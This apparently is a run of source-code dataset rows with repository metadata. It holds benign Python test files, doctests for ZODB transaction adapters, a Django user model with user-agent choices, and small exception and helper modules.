        assert 'name' in doc['definitions']['Pet']['properties']
        assert 'category' in doc['definitions']['Pet']['properties']

    def test_schema_definition_in_api(self):
        # Same expectations, but the definitions are registered directly on
        # the Api object instead of a namespace.
        class CategorySchema(Schema):
            id = fields.Int()
            name = fields.Str(required=True)

        class PetSchema(Schema):
            category = fields.Nested(CategorySchema, many=True)
            name = fields.Str()

        @self.ns.route('/path', _doc=True)
        class SomeHandler(BaseEchoHandler):
            def get():
                '''Get a greeting endpoint.
                ---
                description: Get a greeting
                responses:
                    200:
                        description: A greeting to the client
                        schema: PetSchema
                '''
                pass

            def post():
                pass

        self.api.definition('Category', schema=CategorySchema)
        self.api.definition('Pet', schema=PetSchema)

        doc = self.api.spec.to_dict()
        assert len(doc['definitions']) == 2
        assert 'Category' in doc['definitions']
        assert 'name' in doc['definitions']['Category']['properties']
        assert 'id' in doc['definitions']['Category']['properties']
        assert 'Pet' in doc['definitions']
        assert 'name' in doc['definitions']['Pet']['properties']
        assert 'category' in doc['definitions']['Pet']['properties']

    def test_schema_definition_lazy_loading(self):
        # Definitions registered on a namespace BEFORE it is added to the
        # Api must still end up in the spec once add_namespace runs.
        class CategorySchema(Schema):
            id = fields.Int()
            name = fields.Str(required=True)

        class PetSchema(Schema):
            category = fields.Nested(CategorySchema, many=True)
            name = fields.Str()

        @self.ns.route('/path', _doc=True)
        class SomeHandler(BaseEchoHandler):
            def get():
                '''Get a greeting endpoint.
                ---
                description: Get a greeting
                responses:
                    200:
                        description: A greeting to the client
                        schema: PetSchema
                '''
                pass

            def post():
                pass

        ns = self.api.namespace('lazy_api')
        ns.definition('Category', schema=CategorySchema)
        ns.definition('Pet', schema=PetSchema)
        self.api.add_namespace(ns)

        doc = self.api.spec.to_dict()
        assert len(doc['definitions']) == 2
        assert 'Category' in doc['definitions']
        assert 'name' in doc['definitions']['Category']['properties']
        assert 'id' in doc['definitions']['Category']['properties']
        assert 'Pet' in doc['definitions']
        assert 'name' in doc['definitions']['Pet']['properties']
        assert 'category' in doc['definitions']['Pet']['properties']
| 33.97861
| 75
| 0.519987
| 611
| 6,354
| 5.350246
| 0.12275
| 0.03212
| 0.0881
| 0.056286
| 0.841848
| 0.782808
| 0.77149
| 0.743041
| 0.712144
| 0.712144
| 0
| 0.005202
| 0.364652
| 6,354
| 186
| 76
| 34.16129
| 0.804558
| 0.138181
| 0
| 0.675676
| 0
| 0
| 0.165451
| 0
| 0
| 0
| 0
| 0
| 0.252252
| 1
| 0.153153
| false
| 0.099099
| 0.045045
| 0
| 0.315315
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
cfeb40bf3ffbd541e709c0c323545924d4661130
| 5,245
|
py
|
Python
|
eggs/ZODB-4.1.0-py2.7.egg/ZODB/tests/test_datamanageradapter.py
|
salayhin/talkofacta
|
8b5a14245dd467bb1fda75423074c4840bd69fb7
|
[
"MIT"
] | 2
|
2020-05-16T08:38:34.000Z
|
2020-10-01T01:32:57.000Z
|
eggs/ZODB-4.1.0-py2.7.egg/ZODB/tests/test_datamanageradapter.py
|
salayhin/talkofacta
|
8b5a14245dd467bb1fda75423074c4840bd69fb7
|
[
"MIT"
] | 1
|
2021-03-25T21:51:01.000Z
|
2021-03-25T21:51:01.000Z
|
eggs/ZODB-4.1.0-py2.7.egg/ZODB/tests/test_datamanageradapter.py
|
salayhin/talkofacta
|
8b5a14245dd467bb1fda75423074c4840bd69fb7
|
[
"MIT"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
import unittest
from doctest import DocTestSuite
from transaction._transaction import DataManagerAdapter
from ZODB.tests.sampledm import DataManager
def test_normal_commit():
    # Executable doctest (collected via doctest.DocTestSuite): full two-phase
    # commit through DataManagerAdapter.  The >>> examples and their expected
    # outputs are whitespace-sensitive — blank lines terminate expected
    # output blocks, so edit with care.
    """
    So, we have a data manager:

    >>> dm = DataManager()

    and we do some work that modifies uncommited state:

    >>> dm.inc()
    >>> dm.state, dm.delta
    (0, 1)

    Now we'll commit the changes.  When the data manager joins a transaction,
    the transaction will create an adapter.

    >>> dma = DataManagerAdapter(dm)

    and register it as a modified object. At commit time, the
    transaction will get the "jar" like this:

    >>> jar = getattr(dma, '_p_jar', dma)

    and, of course, the jar and the adapter will be the same:

    >>> jar is dma
    True

    The transaction will call tpc_begin:

    >>> t1 = '1'
    >>> jar.tpc_begin(t1)

    Then the transaction will call commit on the jar:

    >>> jar.commit(t1)

    This doesn't actually do anything. :)

    >>> dm.state, dm.delta
    (0, 1)

    The transaction will then call tpc_vote:

    >>> jar.tpc_vote(t1)

    This prepares the data manager:

    >>> dm.state, dm.delta
    (1, 1)
    >>> dm.prepared
    True

    Finally, tpc_finish is called:

    >>> jar.tpc_finish(t1)

    and the data manager finishes the two-phase commit:

    >>> dm.state, dm.delta
    (1, 0)
    >>> dm.prepared
    False
    """
def test_abort():
    # Executable doctest (collected via doctest.DocTestSuite): aborting a
    # transaction before the two-phase commit starts must roll back the data
    # manager's uncommitted delta.  Whitespace-sensitive — edit with care.
    """
    So, we have a data manager:

    >>> dm = DataManager()

    and we do some work that modifies uncommited state:

    >>> dm.inc()
    >>> dm.state, dm.delta
    (0, 1)

    When the data manager joins a transaction,
    the transaction will create an adapter.

    >>> dma = DataManagerAdapter(dm)

    and register it as a modified object.

    Now we'll abort the transaction.  The transaction will get the
    "jar" like this:

    >>> jar = getattr(dma, '_p_jar', dma)

    and, of course, the jar and the adapter will be the same:

    >>> jar is dma
    True

    Then the transaction will call abort on the jar:

    >>> t1 = '1'
    >>> jar.abort(t1)

    Which aborts the changes in the data manager:

    >>> dm.state, dm.delta
    (0, 0)
    """
def test_tpc_abort_phase1():
    """Abort after commit() but before tpc_vote(); state must be restored.

    So, we have a data manager:
    >>> dm = DataManager()
    and we do some work that modifies uncommitted state:
    >>> dm.inc()
    >>> dm.state, dm.delta
    (0, 1)
    Now we'll commit the changes. When the data manager joins a transaction,
    the transaction will create an adapter.
    >>> dma = DataManagerAdapter(dm)
    and register it as a modified object. At commit time, the
    transaction will get the "jar" like this:
    >>> jar = getattr(dma, '_p_jar', dma)
    and, of course, the jar and the adapter will be the same:
    >>> jar is dma
    True
    The transaction will call tpc_begin:
    >>> t1 = '1'
    >>> jar.tpc_begin(t1)
    Then the transaction will call commit on the jar:
    >>> jar.commit(t1)
    This doesn't actually do anything. :)
    >>> dm.state, dm.delta
    (0, 1)
    At this point, the transaction decides to abort. It calls tpc_abort:
    >>> jar.tpc_abort(t1)
    Which causes the state of the data manager to be restored:
    >>> dm.state, dm.delta
    (0, 0)
    """
def test_tpc_abort_phase2():
    """Abort after tpc_vote(); the prepared data manager must be rolled back.

    So, we have a data manager:
    >>> dm = DataManager()
    and we do some work that modifies uncommitted state:
    >>> dm.inc()
    >>> dm.state, dm.delta
    (0, 1)
    Now we'll commit the changes. When the data manager joins a transaction,
    the transaction will create an adapter.
    >>> dma = DataManagerAdapter(dm)
    and register it as a modified object. At commit time, the
    transaction will get the "jar" like this:
    >>> jar = getattr(dma, '_p_jar', dma)
    and, of course, the jar and the adapter will be the same:
    >>> jar is dma
    True
    The transaction will call tpc_begin:
    >>> t1 = '1'
    >>> jar.tpc_begin(t1)
    Then the transaction will call commit on the jar:
    >>> jar.commit(t1)
    This doesn't actually do anything. :)
    >>> dm.state, dm.delta
    (0, 1)
    The transaction calls vote:
    >>> jar.tpc_vote(t1)
    This prepares the data manager:
    >>> dm.state, dm.delta
    (1, 1)
    >>> dm.prepared
    True
    At this point, the transaction decides to abort. It calls tpc_abort:
    >>> jar.tpc_abort(t1)
    Which causes the state of the data manager to be restored:
    >>> dm.state, dm.delta
    (0, 0)
    >>> dm.prepared
    False
    """
def test_suite():
    """Collect the doctests in this module into a unittest-compatible suite."""
    return DocTestSuite()
if __name__ == '__main__':
    # Run the doctest suite via unittest's command-line entry point.
    unittest.main()
| 21.584362
| 78
| 0.612011
| 738
| 5,245
| 4.292683
| 0.192412
| 0.088384
| 0.090909
| 0.057449
| 0.761995
| 0.749053
| 0.734848
| 0.730429
| 0.730429
| 0.730429
| 0
| 0.01386
| 0.257197
| 5,245
| 242
| 79
| 21.673554
| 0.799281
| 0.792564
| 0
| 0
| 0
| 0
| 0.020997
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.416667
| true
| 0
| 0.333333
| 0.083333
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
5c4e3b2c5dfac076531ac69c001a9a3c1a34393d
| 12,146
|
py
|
Python
|
api/accounts/models.py
|
gpiechnik2/senter
|
6f64f5410fe02a5215ba148553dec45feaadcc09
|
[
"CC0-1.0"
] | 2
|
2021-12-08T19:38:33.000Z
|
2022-01-26T15:02:57.000Z
|
api/accounts/models.py
|
gpiechnik2/senter
|
6f64f5410fe02a5215ba148553dec45feaadcc09
|
[
"CC0-1.0"
] | null | null | null |
api/accounts/models.py
|
gpiechnik2/senter
|
6f64f5410fe02a5215ba148553dec45feaadcc09
|
[
"CC0-1.0"
] | 1
|
2021-12-08T19:38:39.000Z
|
2021-12-08T19:38:39.000Z
|
from django.db import models
from django.contrib.auth.models import AbstractUser
from .managers import CustomUserManager
# Browser user-agent strings offered for User.user_agent.  Django `choices`
# are (stored_value, human_label) pairs; in the original each string was
# hand-duplicated as both value and label.  The strings are now kept once
# and the pairs derived, which removes the duplication without changing the
# resulting value of USER_AGENT_CHOICES.
_USER_AGENTS = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko)",
    "Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko)",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)",
    "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Firefox 66 Windows Gecko Very common",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36",
    "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36",
    "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36",
)
USER_AGENT_CHOICES = tuple((agent, agent) for agent in _USER_AGENTS)
class User(AbstractUser):
    """Custom user model that authenticates by e-mail instead of username."""

    # The username field is removed entirely; e-mail is the unique login key.
    username = None
    username_validator = None

    email = models.EmailField(verbose_name='email', max_length=255, unique=True)
    # NOTE(review): max_length=99999 is unusually large (longest choice is
    # ~290 chars) -- kept unchanged here to avoid a schema migration.
    user_agent = models.CharField(
        max_length=99999,
        choices=USER_AGENT_CHOICES,
        default=USER_AGENT_CHOICES[0][1],
    )
    contact_email = models.EmailField(null=True, blank=True)

    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = ['first_name']

    objects = CustomUserManager()

    # NOTE(review): the ACCOUNT_* names below look like django-allauth
    # settings that normally live in settings.py; as model attributes they
    # appear inert -- confirm whether anything reads them from here.
    ACCOUNT_USER_MODEL_USERNAME_FIELD = None
    ACCOUNT_EMAIL_REQUIRED = True
    ACCOUNT_UNIQUE_EMAIL = True
    ACCOUNT_USERNAME_REQUIRED = False
    ACCOUNT_AUTHENTICATION_METHOD = 'email'
    ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
    ACCOUNT_CONFIRM_EMAIL_ON_GET = True
    #ACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = '/?verification=1'
    #ACCOUNT_EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL = '/?verification=1'

    def get_username(self):
        """Return the e-mail address, which serves as this user's identifier."""
        return self.email

    def save(self, *args, **kwargs):
        """Persist the user, defaulting contact_email to the login e-mail."""
        if self.contact_email is None:
            self.contact_email = self.email
        super().save(*args, **kwargs)
| 138.022727
| 291
| 0.701383
| 2,259
| 12,146
| 3.734838
| 0.083223
| 0.024179
| 0.100273
| 0.125163
| 0.896053
| 0.896053
| 0.896053
| 0.896053
| 0.896053
| 0.896053
| 0
| 0.217597
| 0.129755
| 12,146
| 87
| 292
| 139.609195
| 0.580605
| 0.011856
| 0
| 0
| 0
| 1.246753
| 0.851833
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025974
| false
| 0
| 0.038961
| 0.012987
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5cb3e04837139ea0e6fe5273a6aa1d9efe26c9d8
| 4,803
|
py
|
Python
|
backend/battles/tests/test_helpers.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | null | null | null |
backend/battles/tests/test_helpers.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | 4
|
2021-01-05T18:51:30.000Z
|
2021-04-07T17:03:08.000Z
|
backend/battles/tests/test_helpers.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from model_mommy import mommy
from battles.helpers import get_battle_result
class BattleHelperTests(TestCase):
    """Unit tests for battles.helpers.get_battle_result.

    The original tests repeated the same user/pokemon/battle fixture code
    verbatim; that plumbing is factored into private helpers so each test
    now states only the stats that matter for its scenario.  The mommy.make
    calls and their arguments are unchanged.
    """

    def _make_users(self):
        """Create the creator/opponent user pair shared by every test."""
        creator = mommy.make("users.User", email="creator@test.com")
        opponent = mommy.make("users.User", email="opponent@test.com")
        return creator, opponent

    def _make_team(self, stats):
        """Create one Pokemon per (attack, defense, hit_points) triple."""
        return [
            mommy.make(
                "pokemons.Pokemon", attack=attack, defense=defense, hit_points=hit_points
            )
            for attack, defense, hit_points in stats
        ]

    def _make_battle(self, creator, opponent, creator_team, opponent_team=None):
        """Create a Battle; opponent pokemons are omitted when opponent_team is None."""
        kwargs = {
            "creator": creator,
            "opponent": opponent,
            "creator_pokemon_1": creator_team[0],
            "creator_pokemon_2": creator_team[1],
            "creator_pokemon_3": creator_team[2],
        }
        if opponent_team is not None:
            kwargs.update(
                opponent_pokemon_1=opponent_team[0],
                opponent_pokemon_2=opponent_team[1],
                opponent_pokemon_3=opponent_team[2],
            )
        return mommy.make("battles.Battle", **kwargs)

    def test_creator_wins_battle(self):
        creator, opponent = self._make_users()
        creator_team = self._make_team([(30, 30, 20), (15, 15, 30), (20, 20, 40)])
        opponent_team = self._make_team([(20, 20, 35), (10, 10, 30), (25, 25, 50)])
        battle = self._make_battle(creator, opponent, creator_team, opponent_team)
        winner = get_battle_result(battle)
        self.assertEqual(winner, battle.creator)

    def test_opponent_wins_battle(self):
        creator, opponent = self._make_users()
        creator_team = self._make_team([(10, 10, 20), (5, 5, 15), (20, 20, 40)])
        opponent_team = self._make_team([(20, 20, 35), (10, 10, 30), (25, 25, 50)])
        battle = self._make_battle(creator, opponent, creator_team, opponent_team)
        winner = get_battle_result(battle)
        self.assertEqual(winner, battle.opponent)

    def test_creator_wins_battle_with_draw(self):
        creator, opponent = self._make_users()
        # The creator's third pokemon has higher hit_points, breaking the tie.
        creator_team = self._make_team([(10, 10, 20), (15, 15, 40), (20, 20, 55)])
        opponent_team = self._make_team([(10, 10, 35), (15, 15, 30), (20, 20, 50)])
        battle = self._make_battle(creator, opponent, creator_team, opponent_team)
        winner = get_battle_result(battle)
        self.assertEqual(winner, battle.creator)

    def test_raises_exception_if_battle_has_not_been_resolved_when_getting_result(self):
        creator, opponent = self._make_users()
        creator_team = self._make_team([(10, 10, 20), (5, 5, 15), (20, 20, 40)])
        # No opponent pokemons: the battle is unresolved.
        battle = self._make_battle(creator, opponent, creator_team)
        with self.assertRaises(Exception):
            get_battle_result(battle)
| 41.051282
| 88
| 0.651051
| 602
| 4,803
| 4.963455
| 0.101329
| 0.099398
| 0.119478
| 0.168675
| 0.904953
| 0.892236
| 0.892236
| 0.892236
| 0.892236
| 0.892236
| 0
| 0.050602
| 0.238809
| 4,803
| 116
| 89
| 41.405172
| 0.766685
| 0.031855
| 0
| 0.727273
| 0
| 0
| 0.130144
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 1
| 0.045455
| false
| 0
| 0.034091
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5cd5a3d4aa4af8a5a4c429cd02ada64aaa61088c
| 505
|
py
|
Python
|
twpy/exceptions/__init__.py
|
0x0ptim0us/twpy
|
ab279566e879834c9287bdf09997f332df57efe8
|
[
"MIT"
] | 56
|
2019-12-15T13:24:31.000Z
|
2022-01-21T17:14:26.000Z
|
twpy/exceptions/__init__.py
|
f4rih/twpy
|
ab279566e879834c9287bdf09997f332df57efe8
|
[
"MIT"
] | 5
|
2020-02-25T22:21:55.000Z
|
2022-01-27T09:06:41.000Z
|
twpy/exceptions/__init__.py
|
f4rih/twpy
|
ab279566e879834c9287bdf09997f332df57efe8
|
[
"MIT"
] | 12
|
2019-12-16T14:39:12.000Z
|
2020-10-12T02:50:57.000Z
|
class IndexError(Exception):
    """Error signalling an out-of-range index in a twpy result.

    NOTE(review): this name shadows the builtin ``IndexError`` in any module
    that imports it -- consider renaming in a future major release.

    The original message-only ``__init__`` was redundant: ``Exception``
    already stores and renders its arguments, so it is dropped.  Calling
    with a single message behaves exactly as before.
    """
class ConnectionTimeout(Exception):
    """Error signalling that a network request timed out.

    The redundant message-only ``__init__`` is removed; ``Exception``
    already stores and renders its arguments, so single-message
    construction behaves exactly as before.
    """
class InvalidValue(Exception):
    """Error signalling that a supplied value is not acceptable.

    The redundant message-only ``__init__`` is removed; ``Exception``
    already stores and renders its arguments, so single-message
    construction behaves exactly as before.
    """
class QueryError(Exception):
    """Error signalling that a query could not be performed.

    The redundant message-only ``__init__`` is removed; ``Exception``
    already stores and renders its arguments, so single-message
    construction behaves exactly as before.
    """
class ParameterRequired(Exception):
    """Error signalling that a mandatory parameter was not supplied.

    The redundant message-only ``__init__`` is removed; ``Exception``
    already stores and renders its arguments, so single-message
    construction behaves exactly as before.
    """
| 20.2
| 35
| 0.685149
| 50
| 505
| 6.12
| 0.24
| 0.196078
| 0.261438
| 0.326797
| 0.767974
| 0.767974
| 0.767974
| 0.767974
| 0.627451
| 0
| 0
| 0
| 0.19604
| 505
| 24
| 36
| 21.041667
| 0.753695
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
7a6d5a166ec38f558df8c3fd5b3fb8a2a64cb02b
| 62
|
py
|
Python
|
code/cheat/cheat/cheatsheets/__init__.py
|
cankai/cankai.github.io
|
e09a5b13adc475cb695cae03b5573cb446cca096
|
[
"Apache-2.0"
] | 1
|
2018-11-04T23:59:32.000Z
|
2018-11-04T23:59:32.000Z
|
code/cheat/cheat/cheatsheets/__init__.py
|
cankai/cankai.github.io
|
e09a5b13adc475cb695cae03b5573cb446cca096
|
[
"Apache-2.0"
] | null | null | null |
code/cheat/cheat/cheatsheets/__init__.py
|
cankai/cankai.github.io
|
e09a5b13adc475cb695cae03b5573cb446cca096
|
[
"Apache-2.0"
] | null | null | null |
import os
def sheets_dir():
    """Return ``os.path.split`` of this package's ``__init__.py`` path.

    NOTE(review): despite the name, this returns the full
    ``(directory, filename)`` 2-tuple, not just the directory --
    presumably callers index ``[0]``; confirm before changing.
    """
    return os.path.split(__file__)
| 12.4
| 32
| 0.741935
| 10
| 62
| 4.1
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145161
| 62
| 4
| 33
| 15.5
| 0.773585
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
7a81c5abd9b2c84f62981ab2c79fab1a94bfa254
| 909
|
py
|
Python
|
tests/test_model.py
|
heaven-pool/ton-miner
|
9376f9e8711357e3d2f6547c16cddc73266200fd
|
[
"MIT"
] | null | null | null |
tests/test_model.py
|
heaven-pool/ton-miner
|
9376f9e8711357e3d2f6547c16cddc73266200fd
|
[
"MIT"
] | null | null | null |
tests/test_model.py
|
heaven-pool/ton-miner
|
9376f9e8711357e3d2f6547c16cddc73266200fd
|
[
"MIT"
] | null | null | null |
# # -*- coding: utf-8 -*-
from app.libs import models
def test_job_models():
    """Check that 'create_at' differs between identically-built JobSchema objects.

    The original duplicated the full keyword set for both constructions;
    a single shared dict makes it obvious the two objects differ only in
    their creation timestamp.
    """
    job_fields = dict(
        job_id=661422,
        pool_wallet='EQDv9eExabxeFmiPigOE_NscTo_SXB9IwDXz975hPWjO_cGq',
        complexity='1906156863157627903919216023423475890402376096793739878410580',
        seed='328574290144741374257957134907128616586',
        iterations='100000000000',
        giver_address='kf-P_TOdwcCh0AXHhBpICDMxStxHenWdLCDLNH5QcNpwMHJ8',
    )
    obj1 = models.JobSchema(**job_fields)
    obj2 = models.JobSchema(**job_fields)
    assert obj1.create_at != obj2.create_at
| 45.45
| 86
| 0.773377
| 73
| 909
| 9.383562
| 0.575342
| 0.043796
| 0.052555
| 0.058394
| 0.80292
| 0.80292
| 0.80292
| 0.80292
| 0.80292
| 0.80292
| 0
| 0.328225
| 0.138614
| 909
| 19
| 87
| 47.842105
